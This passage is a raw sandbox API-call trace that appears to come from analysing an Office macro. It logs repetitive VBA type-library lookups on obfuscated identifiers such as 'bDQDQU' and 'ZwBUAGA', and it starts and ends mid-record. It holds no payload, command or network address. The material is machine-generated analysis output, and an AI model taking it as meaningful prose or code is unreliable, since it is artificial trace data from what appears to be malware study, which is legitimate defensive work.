memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.392] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.392] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.392] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.392] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.392] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.392] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.393] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.393] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.393] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.393] IUnknown:Release (This=0x665ba50) returned 0xd [0069.393] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.393] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.393] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80736, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="bDQDQU") returned 7 [0069.393] ITypeComp:RemoteBind (in: This=0x665ba60, szName="bDQDQU", lHashVal=0x10901b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80736, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="bDQDQU") returned 7 [0069.393] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="bDQDQU", lHashVal=0x10901b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80736, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="bDQDQU") returned 7 [0069.393] ITypeComp:RemoteBind (in: This=0x665bd30, szName="bDQDQU", lHashVal=0x10901b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.393] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="bDQDQU") returned 0x10901b [0069.394] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="bDQDQU" | out: _Dst="bDQDQU") returned 0x0 [0069.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="bDQDQU") returned 7 [0069.394] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.394] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="bDQDQU", lHashVal=0x10901b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.394] IUnknown:Release (This=0x665ba50) returned 0xd [0069.394] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.394] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="bDQDQU", lHashVal=0x10901b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.394] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.394] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.394] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="bDQDQU", lHashVal=0x10901b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.394] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.394] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.394] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="bDQDQU", lHashVal=0x10901b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.394] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80736, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="bDQDQU") returned 7 [0069.394] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="bDQDQU", lHashVal=0x10901b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.394] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.394] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80736 | out: _Dst=0x67c2d40) returned 0x0 [0069.394] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_bDQDQU") returned 0x100a85 [0069.394] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_bDQDQU" | out: _Dst="_B_var_bDQDQU") returned 0x0 [0069.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_bDQDQU") returned 14 [0069.394] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.394] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_bDQDQU", lHashVal=0x100a85, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.394] IUnknown:Release (This=0x665ba50) returned 0xd [0069.394] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.394] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_bDQDQU", lHashVal=0x100a85, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.395] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.395] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.395] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_bDQDQU", lHashVal=0x100a85, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.395] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.395] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.395] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_bDQDQU", lHashVal=0x100a85, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.395] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.395] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.395] IUnknown:Release (This=0x665ba50) returned 0xd [0069.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1280e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_bDQDQU") returned 14 [0069.395] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_bDQDQU", lHashVal=0x100a85, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x51004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x62005f00720061, ppTypeComp=0x51004400000000, pDummy=0x0) returned 0x0 [0069.395] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80736 | out: _Dst=0x144ec0) returned 0x0 [0069.395] ITypeComp:RemoteBind (in: This=0x665ba60, szName="GAAA1C", lHashVal=0x10dc67, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80826, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="GAAA1C") returned 7 [0069.395] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="GAAA1C", lHashVal=0x10dc67, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80826, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="GAAA1C") returned 7 [0069.395] ITypeComp:RemoteBind (in: This=0x665bd30, szName="GAAA1C", lHashVal=0x10dc67, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.396] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GAAA1C") returned 0x10dc67 [0069.396] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="GAAA1C" | out: _Dst="GAAA1C") returned 0x0 [0069.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="GAAA1C") returned 7 [0069.396] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.396] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="GAAA1C", lHashVal=0x10dc67, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.396] IUnknown:Release (This=0x665ba50) returned 0xd [0069.396] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.396] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="GAAA1C", lHashVal=0x10dc67, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.396] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.396] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.396] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="GAAA1C", lHashVal=0x10dc67, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.396] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.396] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.396] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="GAAA1C", lHashVal=0x10dc67, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.396] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80826, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="GAAA1C") returned 7 [0069.396] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="GAAA1C", lHashVal=0x10dc67, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.396] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.396] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80826 | out: _Dst=0x67c2d40) returned 0x0 [0069.396] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_GAAA1C") returned 0x1056d1 [0069.396] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="uA_DcU", cchCount1=-1, lpString2="_B_var_GAAA1C", cchCount2=-1) returned 3 [0069.396] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_GAAA1C" | out: _Dst="_B_var_GAAA1C") returned 0x0 [0069.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_GAAA1C") returned 14 [0069.396] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.396] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_GAAA1C", lHashVal=0x1056d1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.397] IUnknown:Release (This=0x665ba50) returned 0xd [0069.397] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.397] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_GAAA1C", lHashVal=0x1056d1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.397] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.397] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.397] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_GAAA1C", lHashVal=0x1056d1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.397] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.397] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.397] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_GAAA1C", lHashVal=0x1056d1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.397] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.397] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.397] IUnknown:Release (This=0x665ba50) returned 0xd [0069.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1283e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_GAAA1C") returned 14 [0069.397] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_GAAA1C", lHashVal=0x1056d1, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x47005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x47005f00720061, ppTypeComp=0x31004100000000, pDummy=0x0) returned 0x0 [0069.397] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80826 | out: _Dst=0x144ec0) returned 0x0 [0069.397] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ZwBUAGA", lHashVal=0x1077a0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b807fe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ZwBUAGA") returned 8 [0069.397] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ZwBUAGA", lHashVal=0x1077a0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b807fe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ZwBUAGA") returned 8 [0069.398] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ZwBUAGA", lHashVal=0x1077a0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.398] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZwBUAGA") returned 0x1077a0 [0069.398] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="ZwBUAGA" | out: _Dst="ZwBUAGA") returned 0x0 [0069.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="ZwBUAGA") returned 8 [0069.398] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.398] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ZwBUAGA", lHashVal=0x1077a0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.398] IUnknown:Release (This=0x665ba50) returned 0xd [0069.398] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.398] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ZwBUAGA", lHashVal=0x1077a0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.398] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.398] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.398] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ZwBUAGA", lHashVal=0x1077a0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.398] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.398] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.398] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ZwBUAGA", lHashVal=0x1077a0, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.398] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b807fe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="ZwBUAGA") returned 8 [0069.398] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ZwBUAGA", lHashVal=0x1077a0, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.398] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.398] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b807fe | out: _Dst=0x67c2d40) returned 0x0 [0069.398] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ZwBUAGA") returned 0x107b24 [0069.398] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_ZwBUAGA" | out: _Dst="_B_var_ZwBUAGA") returned 0x0 [0069.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_ZwBUAGA") returned 15 [0069.398] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.398] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ZwBUAGA", lHashVal=0x107b24, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.398] IUnknown:Release (This=0x665ba50) returned 0xd [0069.399] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.399] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ZwBUAGA", lHashVal=0x107b24, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.399] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.399] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.399] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ZwBUAGA", lHashVal=0x107b24, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.399] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.399] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.399] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ZwBUAGA", lHashVal=0x107b24, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.399] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.399] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.399] IUnknown:Release (This=0x665ba50) returned 0xd [0069.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1286e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_ZwBUAGA") returned 15 [0069.399] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ZwBUAGA", lHashVal=0x107b24, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0) returned 0x0 [0069.399] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b807fe | out: _Dst=0x144ec0) returned 0x0 [0069.399] ITypeComp:RemoteBind (in: This=0x665ba60, szName="kQBC_B", lHashVal=0x102c8e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8084e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="kQBC_B") returned 7 [0069.399] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="kQBC_B", lHashVal=0x102c8e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.399] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8084e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="kQBC_B") returned 7 [0069.399] ITypeComp:RemoteBind (in: This=0x665bd30, szName="kQBC_B", lHashVal=0x102c8e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, 